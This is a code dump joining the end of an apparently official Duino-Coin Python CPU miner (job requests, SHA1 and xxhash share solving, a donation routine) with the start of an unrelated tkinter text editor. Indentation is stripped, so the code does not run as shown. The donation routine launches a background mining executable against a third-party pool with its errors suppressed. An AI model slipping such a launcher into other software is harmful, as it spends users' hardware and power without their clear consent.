+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ resourcesFolder
+ "&& chmod +x Donate_executable "
+ "&& ./Donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donationlevel) <= 0:
prettyPrint(
"sys0",
Fore.YELLOW
+ getString("free_network_warning")
+ getString("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ getString("learn_more_donate"),
"warning")
sleep(10)
elif not donatorrunning:
if int(donationlevel) == 5:
cmd += "95"
elif int(donationlevel) == 4:
cmd += "75"
elif int(donationlevel) == 3:
cmd += "50"
elif int(donationlevel) == 2:
cmd += "20"
elif int(donationlevel) == 1:
cmd += "10"
if int(donationlevel) > 0:
debugOutput(getString("starting_donation"))
donatorrunning = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
prettyPrint(
"sys0",
getString("thanks_donation"),
"warning")
def ducos1(
lastBlockHash,
expectedHash,
difficulty):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 0 to 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
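# Illustrative self-check for the DUCO-S1 solver above (added sketch, never
# called by the miner): craft a job whose answer is known, then confirm that
# ducos1 recovers the nonce. sha1 is the same hashlib import used above.
def _demo_ducos1_selfcheck():
nonce = 42
last_block = "demo"
expected = sha1(("demo" + str(nonce)).encode("ascii")).hexdigest()
result, hashrate = ducos1(last_block, expected, difficulty=1)
assert result == nonce
return hashrate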
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 0 to 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid,
accepted,
rejected,
requestedDiff,
khashcount,
username,
efficiency,
rigIdentifier,
algorithm,
hashrates_list,
totalhashrate_mean):
# Mining section for every thread
while True:
# Grab server IP and port
while True:
try:
# Use requests to grab data from the raw GitHub file
res = requests.get(serveripfile, data=None)
if res.status_code == 200:
# Read content and split into lines
content = (res.content.decode().splitlines())
# Line 1 = IP
masterServer_address = content[0]
# Line 2 = port
masterServer_port = content[1]
debugOutput(
"Retrieved pool IP: "
+ masterServer_address
+ ":"
+ str(masterServer_port))
break
except Exception as e:
# If there was an error with grabbing data from GitHub
prettyPrint(
"net"
+ str(threadid),
getString("data_error")
+ Style.NORMAL
+ Fore.RESET
+ " (git err: "
+ str(e)
+ ")",
"error")
debugOutput("GitHub error: " + str(e))
sleep(10)
# Connect to the server
while True:
try:
soc = socket()
# Establish socket connection to the server
soc.connect((str(masterServer_address),
int(masterServer_port)))
soc.settimeout(timeout)
serverVersion = soc.recv(3).decode().rstrip(
"\n") # Get server version
debugOutput("Server version: " + serverVersion)
if (float(serverVersion) <= float(minerVersion)
and len(serverVersion) == 3):
# If miner is up-to-date, display a message and continue
prettyPrint(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(serverVersion)
+ ")",
"success")
break
else:
# Miner is outdated
prettyPrint(
"sys"
+ str(threadid),
getString("outdated_miner")
+ minerVersion
+ ") -"
+ getString("server_is_on_version")
+ serverVersion
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
break
except Exception as e:
# Socket connection error
prettyPrint(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debugOutput("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
prettyPrint(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
# If efficiency lower than 100...
if float(100 - efficiency * 100) < 100:
# ...sleep some time
sleep(float(efficiency * 5))
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.send(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requestedDiff),
encoding="utf8"))
else:
soc.send(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requestedDiff),
encoding="utf8"))
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",") # Get work from pool
debugOutput("Received: " + str(job))
if job[1] == "This user doesn't exist":
prettyPrint(
"cpu"
+ str(threadid),
getString("mining_user")
+ str(username)
+ getString("mining_not_exist")
+ Style.NORMAL
+ Fore.RESET
+ getString("mining_not_exist_warning"),
"error")
sleep(10)
elif job[0] and job[1] and job[2]:
diff = int(job[2])
debugOutput(str(threadid) +
"Job received: "
+ str(job))
# If job received, continue to hashing algo
break
while True:
# Call DUCOS-1 hasher
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff)
computetimeStop = time()
# Measure compute time
computetime = computetimeStop - computetimeStart
# computetime stays in seconds; it is displayed with an "s" suffix below
# Read result from ducos1 hasher
ducos1res = result[0]
debugOutput("Thread "
+ str(threadid)
+ ": result found: "
+ str(ducos1res))
# Convert H/s to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all threads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.send(bytes(
str(ducos1res)
+ ","
+ str(threadhashcount * 1000)
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(minerVersion)
+ ","
+ str(rigIdentifier),
encoding="utf8"))
responsetimestart = now()
# Get feedback
feedback = soc.recv(8).decode().rstrip("\n")
responsetimestop = now()
# Measure server ping
ping = str(int(
(responsetimestop - responsetimestart).microseconds
/ 1000))
debugOutput("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
else:
# Stay with kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
if feedback == "GOOD":
# If result was correct
accepted.value += 1
# title breaks running as systemd service
if not Service:
title(
getString("duco_python_miner")
+ str(minerVersion)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ✓"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
# title breaks running as systemd service
if not Service:
title(
getString("duco_python_miner")
+ str(minerVersion)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ✓"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
# title breaks running as systemd service
if not Service:
title(
getString("duco_python_miner")
+ str(minerVersion)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ algo_back_color
+ Back.YELLOW
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
break
break
except Exception as e:
prettyPrint(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debugOutput("Error while mining: " + str(e))
sleep(5)
break
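# Wire-protocol sketch of the exchange performed by Thread above (added
# summary; message shapes inferred from the code, not a formal spec):
#   -> "JOB,<username>,<requestedDiff>"   or   "JOBXX,..." for xxhash
#   <- "<lastBlockHash>,<expectedHash>,<difficulty>"
#   -> "<nonce>,<hashrate>,Official PC Miner (<algo>) v<ver>,<rigIdentifier>"
#   <- "GOOD" | "BLOCK" | anything else counts as a rejected share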
def prettyPrint(messageType, message, state):
# Print output messages in the DUCO "standard"
# Usb/net/sys background
if messageType.startswith("net"):
background = Back.BLUE
elif messageType.startswith("cpu"):
background = Back.YELLOW
if messageType.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ messageType
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
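# Example (added): prettyPrint("net0", "connected", "success") prints a
# timestamped line with a blue "net0" badge and the message text in green.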
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debugOutput("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debugOutput("Error launching Discord RPC thead: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debugOutput("Rich presence updated")
except Exception as e:
# Discord not launched
debugOutput("Error launching Discord RPC thead: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
# Processor info
cpu = cpuinfo.get_cpu_info()
if len(sys.argv) > 1 and sys.argv[1] == "-d": Service = True
# Colorama
init(autoreset=True)
# title breaks running as systemd service
if not Service: title(getString("duco_python_miner") + str(minerVersion) + ")")
try:
from multiprocessing import Manager, Process, Value, cpu_count, current_process
manager = Manager()
# Multiprocessing fix for pyinstaller
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
prettyPrint(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 15s.",
"error")
sleep(15)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debugOutput("Config file loaded")
except Exception as e:
prettyPrint(
"sys0",
getString("load_config_error")
+ resourcesFolder
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debugOutput("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debugOutput("Greeting displayed")
except Exception as e:
prettyPrint(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debugOutput("Error displaying greeting message: " + str(e))
try:
# Start donation thread
Donate()
except Exception as e:
debugOutput("Error launching donation thread: " + str(e))
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requestedDiff,
khashcount,
username,
efficiency,
rigIdentifier,
algorithm,
hashrates_list,
totalhashrate_mean))
thread[x].start()
sleep(0.1)
except Exception as e:
prettyPrint(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debugOutput("Error launching CPU thead(s): " + str(e))
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debugOutput("Error launching Discord RPC thead: " + str(e))
|
main.py | import tkinter
from tkinter import ttk
from tkinter import font
from tkinter import filedialog
import math
import re
import json
import subprocess
import requests
try: from bs4 import BeautifulSoup # usually doesn't get imported when running as root
except Exception: pass
import random
import threading
import sys
import pytz
from importlib import reload as importlib_reload
try: import psutil # usually doesn't get imported when running as root
except Exception: pass
from highlighter import *
from command_parser import *
from util import *
from inspect import isclass
WINDOW_MARGIN = 0
if (platform == "Windows"):
import ctypes
ctypes.windll.shcore.SetProcessDpiAwareness(True)
elif (platform == "Linux"):
WINDOW_MARGIN = 24 # weird GTK fuckery
CRLF="\r\n"
LF="\n"
class WIN(tkinter.Tk):
# """
# this whole project is very weird and I made a lot of pretty bad decisions,
# but ultimately it's working (at least a bit on Linux anyways)
# It lags a lot on macOS and Windows, because tkinter sucks with a lot of text
# (especially with long lines) and can't process it very well, which makes it lag
# also making a text editor in Python is a very questionable idea on its own
# it also isn't really optimized in any way at all
# summary: this editor sucks, but I can use it better than other editors so I don't care
# if you use mainly C, C++ check out 4coder (it's going to become free as of 1.7.2021),
# it's a really cool editor
# """
def __init__(self, file=None):
super().__init__()
self.conf = {
"theme": "spacey",
"tab_size": 4,
"orientate": "down",
"backup_files": 0,
"underline_pairs": 0,
"font_size": 12,
"smaller_font_size": 11,
"command_entry_font_size": 11,
"find_entry_font_size": 12,
"command_out_font_size": 11,
"suggest_widget_font_size": 11,
"start_width": 80,
"start_height": 32,
"show_buffer_tab": 1,
"line_end": LF,
"suggest": 1,
"font": "Consolas",
"default_find_mode": "?",
"username": "",
"default_split_mode": "vertical",
"keybinds_file": "keybinds_conf.json",
"themes_file": "theme_conf.json",
"show_speed": False,
"show_temperature": True,
"show_time": True,
"show_line_no": True,
"show_keypress": True,
"show_buffer_name": True,
"highlight_line": False,
"cursor_style": 2,
"allow_external_modules": 1,
"allow_notifications": 1,
"alpha": 100,
"percentage_pos_func": self.get_abs_percentage_pos,
"buffer_border_style": "ridge",
"command_entry_border_style": "ridge",
"command_out_border_style": "ridge",
"find_border_style": "ridge",
"suggest_widget_border_style" : "ridge",
"supress_keybind_warning": 1,
"find_on_key": 1,
"timezone": "GMT-8",
}
self.split_mode_options = {
"nosplit": self.nosplit,
"v": self.split_vertical,
"vertical": self.split_vertical,
"h": self.split_horizontal,
"horizontal": self.split_horizontal,
}
self.theme_options = load_themes(f'{SOURCE_PATH}/{self.conf["themes_file"]}')
self.load_conf()
self.widgets = []
self.found = []
self.found_index = 0
self.fullscreen = False
self.split_mode = "nosplit"
self.subprocesses = []
self.command_history = []
self.run = True
self.font_set()
#configuring main window
# self.wm_attributes("-type", "splash")
self.resizable(True,True)
# self.geometry(f"{self.font.measure(' ')*self.conf['start_width']}x{self.font.metrics('linespace')*self.conf['start_height']}")
self.wm_minsize(20, 0)
self.geometry("1080x720")
self.update_win()
# self.geometry(f"{self.winfo_width()}x{self.winfo_height()}+{self.winfo_x()+self.winfo_width()//2}+{(self.winfo_screenheight()-self.winfo_height())//2}") #CENTERING MAGIC #PROLLY DOESN'T WORK THOUGH
# try: self.iconbitmap("icon.ico")
# except Exception as e: print(e)
try: self.tk.call('wm', 'iconphoto', self._w, tkinter.PhotoImage(file=f"{os.path.dirname(os.path.abspath(__file__))}/icon.png"))
except Exception as e: print(e)
self.canvas = tkinter.Canvas()
self.buffer_tab_frame = tkinter.Frame(self)
self.buffer_frame = tkinter.Frame(self)
self.buffer_render_list = []
self.buffer_render_index = 0
self.buffer_tab_render_list = []
# self.file_handler.buffer_tab.buffer_index or self.buffer.buffer_index is the index for this
self.parser = PARSER(self)
self.file_handler = FILE_HANDLER(self)
# self.video_handler = VIDEO_HANDLER(self)
# self.music_player = MUSIC_PLAYER(self)
self.update_win()
self.l = tkinter.Text(font=self.font, spacing1=0)
for i in range(1000):
self.l.insert("insert", f"{i}\n")
self.l.place(x=-1, y=20, w=0, h=1000)
self.time_label = tkinter.Label()
self.time_label_value = tkinter.StringVar()
self.time_label_value.set("0:0:0")
self.temperature_label = tkinter.Label(text=self.get_rand_temperature())
self.line_no = tkinter.Label()
self.fps_label = tkinter.Label()
self.key_label = tkinter.Label()
self.buffer_name_label = tkinter.Label()
self.buffer = None # file_handler.init uses this variable, so if it's not declared before running the function it's going to break
self.file_handler.init(".scratch") #see handlers.py/FILE_HANDLER
# self.curs = tkinter.Label(self.buffer, bg=self.theme["window"]["fg"])
# self.buffer is only meant to be a pointer to the focused text buffer
# this pointer points to buffer_render_list which is a list of pointers pointing to
# text buffers stored in the file_handler.buffer_list
# self.test_label = tkinter.Label(text="test")
# self.buffer.window_create("1.0", window=self.test_label, stretch=1)
# print(self.buffer.dlineinfo("1.0"))
# see widgets.py
self.find_entry = FIND_ENTRY(self)
self.command_entry = COMMAND_ENTRY(self)
self.command_out = COMMAND_OUT(self)
self.suggest_widget = SUGGEST_WIDGET(self)
self.suggest_widget.configure_self()
self.prompt = BOX(self)
self.load_modules()
self.canvas.configure(bd=0, highlightthickness=0)
self.buffer_tab_frame.configure(relief="ridge", borderwidth=0, highlightthickness=0)
self.buffer_frame.configure(relief="flat", borderwidth=0, highlightthickness=0)
self.time_label.configure(fill=None, anchor="w", justify="left")
self.temperature_label.configure(fill=None, anchor="w")
self.line_no.configure(fill=None, anchor="w", justify="left")
self.fps_label.configure(fill=None, anchor="w", justify="left")
self.key_label.configure(fill=None, anchor="w", justify="left")
self.buffer_name_label.configure(fill=None, anchor="w", justify="left")
self.command_entry.configure_self()
self.find_entry.configure_self()
self.command_out.configure_self()
self.alpha_set(self.conf["alpha"])
bind_keys_from_conf(self)
self.reposition_widgets()
self.theme_load()
self.update_buffer()
self.update_win()
# self.command_out.unplace() # weird fucking bug making the output widget appear for basically no reason
if (len(sys.argv) > 1): [self.file_handler.load_file(filename=os.path.abspath(arg)) for arg in sys.argv[1:]]; self.file_handler.load_buffer(buffer_index=1)
def load_conf(self):
# this is gross, but it works
try: file = open(f"{SOURCE_PATH}/conf", "r"); conf = file.read(); file.close()
except Exception: return
for index, line in enumerate(conf.split("\n"), 1):
if (line and line[0] != "#"): # checks if line isn't empty and if doesn't start with "#" signifying a comment
line = line.split("=") # split the line into two sections
line[0] = line[0].strip() # strip the spaces
line[1] = line[1].strip()
try: self.conf[line[0]] = globals()[line[1]]; continue # try if the second section is a global object
except KeyError: pass
try: self.conf[line[0]] = getattr(self, line[1]); continue # try if the second section is a object in this class
except Exception: pass
try:
if (line[1][0] != "\""): self.conf[line[0]] = int(line[1]) # checks if the second section starts with a double quote (a string) and if it doesn't it signifies an integer
else: self.conf[line[0]] = line[1].strip("\"") # otherwise it's a string (so we strip the excessive double quotes)
except Exception as e: print(f"Error while loading conf file line: {index} \nErorr: {e}")
self.theme = self.theme_options[self.conf["theme"]] # sets the theme
self.alpha_set(self.conf["alpha"]) # sets the alpha
self.conf["timezone"] = pytz.timezone("Etc/"+self.conf["timezone"])
try: self.theme_load() # HACK: tries to load the theme, but theme_load errors at startup because the needed objects aren't completely initialized
except Exception: pass
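# Example conf file accepted by load_conf above (added illustration; the keys
# are real self.conf entries, the values shown are arbitrary):
#   # lines starting with '#' are comments
#   font_size = 14        # bare values are stored as int
#   font = "Consolas"     # quoted values are stored as str
#   theme = "spacey"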
def add_module(self, name, _class):
_class = _class(self)
if (hasattr(_class, "importable") and getattr(_class, "importable")):
setattr(self, name, _class)
if (hasattr(_class, "type") and _class.type == "widget"):
self.widgets.append(_class)
else:
del _class
def load_modules(self, dir=None, reload=False):
# who the fuck made python modules so stupid
# java levels of abstraction
if (not self.conf["allow_external_modules"]): return
if (not dir): dir = f"{SOURCE_PATH}/modules" # if the dir is not specified we want to take the path of the source file
else: dir = os.path.dirname(dir) if (not os.path.isdir(dir)) else dir # if the dir is specified we want to check if it's an actual directory and if it's a file we just use the path to the file
print("Loading modules from: ", dir)
if (not os.path.isdir(dir)): print("no modules directory"); return
for file in os.listdir(dir): # iterate through the files in the modules directory
if (os.path.isdir(file)): # recursively loads modules from subdirectories in the modules directory
self.load_modules(dir=os.path.abspath(f"{dir}/{file}"))
if (file[-3:] == ".py"):
file = file[:-3] # take the (.py) extension out of the file name
modules = __import__(f"modules.{file}") # import the "module" from the modules directory
module = modules.__dict__[file] # get the exact file we're looking for
if (reload): importlib_reload(module) # reload the module
for attr in module.__dict__.keys(): # iterate through the attributes of the imported file
c = getattr(module, attr) # get the attribute from the file
if (isclass(c)): # check if there's a class declared in the file
self.add_module(attr, c) # if it's a class we add it to self under the filename
del modules # delete the redundant stuff
def reload_modules(self, dir=None):
self.load_modules(dir, reload=True)
def theme_make(self):
for buffer in self.buffer_render_list: # because fuck efficiency, right?
if (type(buffer) != TEXT): return # if the buffer isn't a text buffer we don't want to set these
for item in self.theme["highlighter"].items(): # iterate through the theme
if (type(item[1]) == str):
if (item[0][-2:] == "bg"): # if the name ends with bg we want to create a tag that uses the color specified as a background color
buffer.tag_configure(item[0], background=item[1], foreground=self.theme["window"]["bg"], font=buffer.font)
buffer.tag_configure(item[0][:-3], foreground=item[1], font=buffer.font) # but we create a tag with the specified color as the foreground color
self.command_out.tag_configure(item[0], background=item[1], foreground=self.theme["window"]["bg"], font=self.command_out.font) # do the same for the other text widgets
self.command_out.tag_configure(item[0][:-3], foreground=item[1], font=self.command_out.font)
self.suggest_widget.tag_configure(item[0][:-3], foreground=item[1], font=self.suggest_widget.font)
elif (item[0][-2:] == "_b"): # bold
buffer.tag_configure(item[0][:-2], foreground=item[1], font=buffer.font_bold)
self.command_out.tag_configure(item[0][:-2], foreground=item[1], font=self.command_out.font_bold)
self.suggest_widget.tag_configure(item[0][:-2], foreground=item[1], font=self.suggest_widget.font_bold)
else: # normal tag
buffer.tag_configure(item[0], foreground=item[1], font=buffer.font) # , borderwidth=2, relief="groove", bgstipple="gray75"
self.command_out.tag_configure(item[0], foreground=item[1], font=self.command_out.font)
self.suggest_widget.tag_configure(item[0], foreground=item[1], font=self.suggest_widget.font)
else:
try:
item[1]["font"] = self.buffer.font
item[1]["bold"]
item[1]["font"] = self.buffer.font_bold
item[1].pop("bold")
except KeyError: pass
buffer.tag_configure(item[0], **item[1])
item[1].pop("font")
self.command_out.tag_configure(item[0], **item[1], font=self.command_out.font)
self.suggest_widget.tag_configure(item[0], **item[1], font=self.suggest_widget.font)
self.command_entry.tag_configure("command_keywords", foreground=self.theme["highlighter"]["command_keywords"])
self.buffer.tag_raise("cursor")
def theme_set(self, theme=None):
if (type(theme) == list): theme = theme[-1] # failsafe switch when selecting multiple themes through the command_out widget
self.theme = self.theme_options[theme]
self.theme_load() # load the theme
self.highlight_chunk() # highlight with new theme
def theme_load(self):
self.theme_make() # create the tags used in text buffers
# configure a whole lot of widgets
self.configure(bg=self.theme["window"]["bg"], cursor=None)
self.canvas.configure(bg=self.theme["window"]["bg"])
self.buffer_tab_frame.configure(bg=self.theme["window"]["bg"])
self.buffer_frame.configure(bg=self.theme["window"]["bg"])
self.time_label.configure(font=self.widget_font, textvariable=self.time_label_value, bg = self.theme["window"]["bg"], fg=self.theme["window"]["widget_fg"])
self.temperature_label.configure(font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.line_no.configure(font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.fps_label.configure(font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.key_label.configure(font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.buffer_name_label.configure(text=self.buffer.name, font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.command_entry.configure_self()
self.find_entry.configure_self()
self.command_out.configure_self()
self.suggest_widget.configure_self()
self.prompt.configure_self()
for buffer in self.buffer_render_list:
buffer.configure_self()
if (self.conf["show_buffer_tab"]):
[buffer_tab.configure_self() for buffer_tab in self.file_handler.buffer_tab_list]
if (self.file_handler.buffer_tab): self.file_handler.buffer_tab.focus_highlight()
for widget in self.widgets:
widget.configure_self()
self.update_win()
def font_set(self, arg=None, family=None):
if (not family): family=self.conf["font"]
self.font_family = [family, "normal", "bold", "roman"]
self.font = font.Font(family=self.font_family[0], size=self.conf["font_size"], weight=self.font_family[1], slant=self.font_family[3])
self.font_bold = font.Font(family=self.font_family[0], size=self.conf["font_size"], weight="bold", slant=self.font_family[3])
self.smaller_font = font.Font(family=self.font_family[0],size=self.conf["smaller_font_size"], weight=self.font_family[1])
self.smaller_font_bold = font.Font(family=self.font_family[0],size=self.conf["smaller_font_size"], weight="bold")
self.widget_font = font.Font(family=self.font_family[0], size=self.conf["smaller_font_size"], weight=self.font_family[2])
#lazy workaround
try: self.theme_load() # fails on startup
except Exception: pass
def font_set_all(self, arg=None, size=None):
self.conf["font_size"] = size
self.conf["smaller_font_size"] = size - 2
self.font_set()
self.command_out.font_size = size
self.command_out.smaller_font_size = size - 2
self.command_out.font_size_set()
self.find_entry.font_size = size
self.find_entry.smaller_font_size = size - 2
self.find_entry.font_size_set()
self.command_entry.font_size = size
self.command_entry.smaller_font_size = size - 2
self.command_entry.font_size_set()
self.file_handler.buffer_tab.font = self.widget_font
self.file_handler.buffer_tab.configure_self()
for b in self.file_handler.buffer_list:
b[1].font = self.widget_font
b[0].font_size = size
b[0].smaller_font_size = size - 2
b[0].font_size_set()
for b in self.file_handler.buffer_tab_list:
b.font = self.widget_font
for widget in self.widgets:
widget.font = self.widget_font
widget.font_size = self.conf["smaller_font_size"]
widget.configure_self()
try: self.theme_load()
except Exception: pass
def get_color_from_theme(self, color, arg="foreground"):
""" """
res = None
theme=self.theme["highlighter"]
try:
if (type(theme[color]) == dict):
if (type(arg) == str):
res = theme[color][arg]
elif (type(arg) == list):
res = []
for a in arg:
res.append(theme[color][a])
elif (type(theme[color]) == str):
res = theme[color]
except KeyError as e: print("error in get_color_from_theme: ", e); self.error(f"{e}")
return res
def alpha_set(self, arg=None):
self.wm_attributes("-alpha", arg/100)
def reposition_widgets(self, arg=None):
btf_bd = self.buffer_tab_frame["bd"]+1 # border width
fs = self.widget_font.metrics("linespace") # font height
buffer_tab_y = fs//1.5+4
txt_y = fs*2
win_width = self.winfo_width()
win_height = self.winfo_height()
if (self.conf["show_buffer_tab"] and len(self.file_handler.buffer_list) > 0): # checks if we can show the buffer tabs in the config and if there are any buffers opened except the scratch buffer
# x = self.file_handler.buffer_tab.winfo_x()
# w = self.file_handler.buffer_tab.winfo_width()
# if (x >= win_width or x + w >= win_width):
